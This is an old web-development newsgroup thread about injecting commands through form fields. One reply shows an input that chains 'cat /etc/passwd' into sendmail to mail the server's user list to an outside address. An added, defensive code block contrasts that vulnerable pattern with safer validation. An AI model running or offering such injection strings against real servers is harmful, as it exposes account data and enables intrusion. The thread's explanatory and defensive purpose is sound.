hack script and forms

  • steve

    hack script and forms

    Hi all

    what is it about that some one can paste script in the form field and
    submit the form and than what?

    can some one open my ice about that
    I like to know the bead and the good things about it

    Thanks


  • Brian

    #2
    Re: hack script and forms


    "steve" <NOSPAMstoianstoian@hotmail.com> wrote in message
    news:bqjil0$qqe$1@ctb-nnrp2.saix.net...
    > Hi all
    >
    > what is it about that some one can paste script in the form field and
    > submit the form and than what?
    >
    > can some one open my ice about that
    > I like to know the bead and the good things about it
    >
    > Thanks
    >
    >

    Hmmmm... I am guessing that this is a poor translation, because I have no
    idea what you are asking... sorry.



    • Lee

      #3
      Re: hack script and forms

      Brian said:
      >
      >
      >"steve" <NOSPAMstoianstoian@hotmail.com> wrote in message
      >news:bqjil0$qqe$1@ctb-nnrp2.saix.net...
      >> Hi all
      >>
      >> what is it about that some one can paste script in the form field and
      >> submit the form and than what?
      >>
      >> can some one open my ice about that
      >> I like to know the bead and the good things about it
      >>
      >> Thanks
      >>
      >>
      >
      >Hmmmm... I am guessing that this is a poor translation, because I have no
      >idea what you are asking... sorry.

      I think he was trying to be clever.
      open my ice = "open my eyes".


      • Brian

        #4
        Re: hack script and forms


        "Lee" <REM0VElbspamtrap@cox.net> wrote in message
        news:bql21u01hmg@drn.newsguy.com...
        > Brian said:
        > >
        > >
        > >"steve" <NOSPAMstoianstoian@hotmail.com> wrote in message
        > >news:bqjil0$qqe$1@ctb-nnrp2.saix.net...
        > >> Hi all
        > >>
        > >> what is it about that some one can paste script in the form field and
        > >> submit the form and than what?
        > >>
        > >> can some one open my ice about that
        > >> I like to know the bead and the good things about it
        > >>
        > >> Thanks
        > >>
        > >>
        > >
        > >Hmmmm... I am guessing that this is a poor translation, because I have no
        > >idea what you are asking... sorry.
        >
        > I think he was trying to be clever.
        > open my ice = "open my eyes".
        >

        Yeah, I read it that way... I still don't know what he is asking, and it is
        likely the case for the other readers of this group.

        Brian



        • Lee

          #5
          Re: hack script and forms

          Brian said:
          >
          >
          >"Lee" <REM0VElbspamtrap@cox.net> wrote in message
          >news:bql21u01hmg@drn.newsguy.com...
          >> Brian said:
          >> >
          >> >
          >> >"steve" <NOSPAMstoianstoian@hotmail.com> wrote in message
          >> >news:bqjil0$qqe$1@ctb-nnrp2.saix.net...
          >> >> Hi all
          >> >>
          >> >> what is it about that some one can paste script in the form field and
          >> >> submit the form and than what?
          >> >>
          >> >> can some one open my ice about that
          >> >> I like to know the bead and the good things about it
          >> >>
          >> >> Thanks
          >> >>
          >> >>
          >> >
          >> >Hmmmm... I am guessing that this is a poor translation, because I have no
          >> >idea what you are asking... sorry.
          >>
          >> I think he was trying to be clever.
          >> open my ice = "open my eyes".
          >>
          >
          >Yeah, I read it that way... I still don't know what he is asking, and it is
          >likely the case for the other readers of this group.

          Oh. I understood the poorly-written question immediately, but my
          first impression had been that "open my ice" was a mistranslation,
          so I assumed that it was what was confusing you, too.

          He seems to be asking if it's true that a badly written server-side
          script can be coerced into executing code entered into form fields.

          Yes. He should read up on web server security.


          • 620

            #6
            Re: hack script and forms


            "Brian" <BrianGenisio@nospam.yahoo.com> wrote in message
            news:3fce1be9$1@10.10.0.241...
            >
            > "Lee" <REM0VElbspamtrap@cox.net> wrote in message
            > news:bql21u01hmg@drn.newsguy.com...
            > > Brian said:
            > > >
            > > >
            > > >"steve" <NOSPAMstoianstoian@hotmail.com> wrote in message
            > > >news:bqjil0$qqe$1@ctb-nnrp2.saix.net...
            > > >> Hi all
            > > >>
            > > >> what is it about that some one can paste script in the form field and
            > > >> submit the form and than what?
            > > >>
            > > >> can some one open my ice about that
            > > >> I like to know the bead and the good things about it
            > > >>
            > > >> Thanks
            > > >>
            > > >>
            > > >
            > > >Hmmmm... I am guessing that this is a poor translation, because I have no
            > > >idea what you are asking... sorry.
            > >
            > > I think he was trying to be clever.
            > > open my ice = "open my eyes".
            > >
            >
            > Yeah, I read it that way... I still don't know what he is asking, and it is
            > likely the case for the other readers of this group.
            >
            > Brian
            >
            >

            ....in other words, what's this I hear about people putting script (i.e.,
            "var x = 0 / 0;") into the textbox of a form and submitting the form. What
            happens thereafter, someone explain it to me, and what are the good and...
            bead things about it.

            And the answer is:

            In order to open the Closed Eye of the Ice Demon, you'll need a Bottled Fire
            Elemental (get that in the linux/apache ng). Once the Eye is open, you take
            your Beads of the Deliquent Monk that you get in this ng and wrap them
            around the Ancient Staff of Warding (I have no idea where you get an ASoW
            these days, check google). Once the Beads are on the Staff, a localised
            blaze will ignite on the staff, about 3/4 of the way up. Let it burn itself
            out. A charred, round depression (socket) will be left. Put the Open eye
            into the charred socket. This creates the Visionary Staff of Deliquency.
            Come back and see me after you've obtained the staff and I'll show you how
            to smite a form with it.



            • Brian

              #7
              Re: hack script and forms


              "Lee" <REM0VElbspamtrap@cox.net> wrote in message
              news:bqlau102ddv@drn.newsguy.com...
              > Brian said:
              > >
              > >
              > >"Lee" <REM0VElbspamtrap@cox.net> wrote in message
              > >news:bql21u01hmg@drn.newsguy.com...
              > >> Brian said:
              > >> >
              > >> >
              > >> >"steve" <NOSPAMstoianstoian@hotmail.com> wrote in message
              > >> >news:bqjil0$qqe$1@ctb-nnrp2.saix.net...
              > >> >> Hi all
              > >> >>
              > >> >> what is it about that some one can paste script in the form field and
              > >> >> submit the form and than what?
              > >> >>
              > >> >> can some one open my ice about that
              > >> >> I like to know the bead and the good things about it
              > >> >>
              > >> >> Thanks
              > >> >>
              > >> >>
              > >> >
              > >> >Hmmmm... I am guessing that this is a poor translation, because I have no
              > >> >idea what you are asking... sorry.
              > >>
              > >> I think he was trying to be clever.
              > >> open my ice = "open my eyes".
              > >>
              > >
              > >Yeah, I read it that way... I still don't know what he is asking, and it is
              > >likely the case for the other readers of this group.
              >
              > Oh. I understood the poorly-written question immediately, but my
              > first impression had been that "open my ice" was a mistranslation,
              > so I assumed that it was what was confusing you, too.
              >
              > He seems to be asking if it's true that a badly written server-side
              > script can be coerced into executing code entered into form fields.
              >
              > Yes. He should read up on web server security.
              >

              Oh, in that case, the poster should stop being cute, and get to the point.
              Basically, the answer is yes... it is very easy to screw with a badly
              written server-side script.

              For instance, let's say your script does something like:

              exec("SomeShellFunction " + formValue + " someParameter");

              and the user enters: something ; cat /etc/passwd | sendmail
              yahoo@yahoo.com;

              That is a very simple example of making a mess, and finding all of the users
              on the server :)

              A good way to _start_ to prevent it, is to do some server-side variable
              checking, and stripping illegal characters, such as ";`'@$ etc.

              B
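
The pattern in the post above, shown as an added example that is not part of the original thread: form data concatenated into a shell string, next to the same call made with an argument vector, the character stripping the post suggests as a start, and an allowlist check. `echo lookup` stands in for the post's `SomeShellFunction`; the function names, the allowlist pattern and the sample input are assumptions constructed for illustration.

```python
import re
import subprocess

# Constructed input modelled on the post: a value, then a shell metacharacter
# and a second, harmless command.
HOSTILE = "something ; echo INJECTED"

def run_concatenated(form_value):
    """Vulnerable pattern from the post: form data pasted into a shell string."""
    cmd = "echo lookup " + form_value + " someParameter"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def run_argv(form_value):
    """No shell involved: the form value reaches the program as one argument."""
    argv = ["echo", "lookup", form_value, "someParameter"]
    return subprocess.run(argv, capture_output=True, text=True).stdout

def strip_listed(form_value):
    """Denylist as suggested in the post: remove the characters it lists."""
    return re.sub(r"[\";`'@$]", "", form_value)

# Allowlist (assumed policy): short names made of letters, digits, _ . -
ALLOWED = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def validate(form_value):
    """Reject anything that is not an expected value instead of repairing it."""
    if not ALLOWED.fullmatch(form_value):
        raise ValueError("rejected form value")
    return form_value

if __name__ == "__main__":
    print(run_concatenated(HOSTILE))   # the shell runs two commands
    print(run_argv(HOSTILE))           # one command, metacharacters stay literal
    print(strip_listed("a ; b | c"))   # the pipe is still present
```

Stripping a fixed list of characters leaves others, such as the pipe used in the post's own input, so validating against what a field is expected to contain and passing it without a shell is the more reliable combination.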




              • steve

                #8
                Re: hack script and forms

                > >> >> Hi all
                > >> >>
                > >> >> what is it about that some one can paste script in the form field and
                > >> >> submit the form and than what?
                > >> >>
                > >> >> can some one open my ice about that
                > >> >> I like to know the bead and the good things about it
                > >> >>
                > >> >> Thanks
                > >> >>
                > >> >>
                > >> >
                > >> >Hmmmm... I am guessing that this is a poor translation, because I have no
                > >> >idea what you are asking... sorry.
                > >>
                > >> I think he was trying to be clever.
                > >> open my ice = "open my eyes".
                > >>
                > >
                > >Yeah, I read it that way... I still don't know what he is asking, and it is
                > >likely the case for the other readers of this group.
                >
                > Oh. I understood the poorly-written question immediately, but my
                > first impression had been that "open my ice" was a mistranslation,
                > so I assumed that it was what was confusing you, too.
                >
                > He seems to be asking if it's true that a badly written server-side
                > script can be coerced into executing code entered into form fields.
                >
                > Yes. He should read up on web server security.

                Sorry about my English
                I did not try to be clever, I just want to know as Lee gas how does
                that work and does it affect the server or the user computer.

                For example I have a web page .html with a form in site using form to
                mail function.
                What script can somebody use to harm me or the server.
                How can I protect myself from such scripts
                and on the other hand
                How can I use such script to harm somebody's computer or a server.

                Thanks and I hope that you guys understand my English



                • Lee

                  #9
                  Re: hack script and forms

                  steve said:

                  >Sorry about my English

                  Sorry about guessing incorrectly.

                  >I did not try to be clever, I just want to know as Lee [guess] how does
                  >that work and does it affect the server or the user computer.

                  The server.

                  >For example I have a web page .html with a form in site using form to
                  >mail function.
                  >What script can somebody use to harm me or the server.
                  >How can I protect myself from such scripts

                  If you're using a form to mail function provided by your ISP or some
                  other site, then you (and they) should be safe. People don't usually
                  have much need to write their own, so I'm assuming that's the case.
